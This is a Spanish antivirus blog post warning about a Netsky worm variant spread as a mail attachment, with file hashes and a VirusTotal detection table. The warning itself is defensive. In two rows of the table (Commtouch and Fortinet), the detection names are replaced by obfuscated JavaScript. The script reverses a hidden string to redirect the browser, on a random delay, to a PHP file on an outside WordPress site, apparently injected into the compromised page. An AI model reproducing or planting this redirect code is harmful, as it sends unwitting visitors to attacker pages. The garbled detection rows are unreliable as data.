Variante de NETSKY está llegando anexado a un mail masivo

Publicado el 27 diciembre 2013 ¬ 18:06 pmh.mscComentarios desactivados en Variante de NETSKY está llegando anexado a un mail masivo

Otra vez llega este conocido malware, anexado a un mail masivo

Ya es controlado de antaño por el ELINETSA, pero siguen enviandolo a por los que no tienen antivirus residente…

El preanalisis de virustotal ofrece este informe:
MD5 3018e99857f31a59e0777396ae634a8f
SHA1 7031cfe76ee7b2c925f2c00372fb9ef7f983f60c
SHA256: c8fffb2e737514c551b2d7bcaf8baa459564b059cab1a35a3cec4b3c270d4525
Nombre: message.scr
Detecciones: 45 / 47
Fecha de análisis: 2013-12-27 16:14:54 UTC ( hace 3 minutos )

1 14
Antivirus  Resultado  Actualización
Ad-Aware  Win32.Generic.497472  20131226
Agnitum  I-Worm.NetSky!4NWvXC1SwiU  20131227
AhnLab-V3   20131227
AntiVir  Worm/Netsky.AP  20131227
Antiy-AVL  Worm/Win32.NetSky  20131227
Avast  Win32:Netsky-AF [Wrm]  20131227
AVG  I-Worm/Netsky  20131227
Baidu-International  Worm.Win32.NetSky.AHuh  20131213
BitDefender  Win32.Generic.497472  20131227
Bkav  W32.SkyNetP.Worm  20131227
ByteHero   20131226
CAT-QuickHeal  W32.NetSky.P  20131222
ClamAV  Worm.NetSky-14  20131227
Commtouch  $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:W32/Netsky.P@mm”>W32/Netsky.P@mm  20131227
F-Secure  Win32.Generic.497472  20131227
Fortinet  $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:W32/Netsky.p@MM”>W32/Netsky.p@MM  20131227
McAfee-GW-Edition  Heuristic.BehavesLike.Win32.Suspicious-PKR.G  20131227
Microsoft  Worm:Win32/Netsky.P@mm  20131227
MicroWorld-eScan  Win32.Generic.497472  20131227
NANO-Antivirus  Trojan.Win32.NetSky.idzx  20131227
Norman  Netsky.P  20131227
nProtect  Worm/W32.NetSky.29568  20131227
Panda  W32/Netsky.AE.worm  20131227
Rising  PE:Trojan.Win32.Generic.129CEE65!312274533  20131227
Sophos  W32/Netsky-P  20131227
SUPERAntiSpyware  Worm.Netsky-P  20131227
Symantec  __________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.

Virus, , , , , , , , , , , ,

Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.

Los comentarios están cerrados.

 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies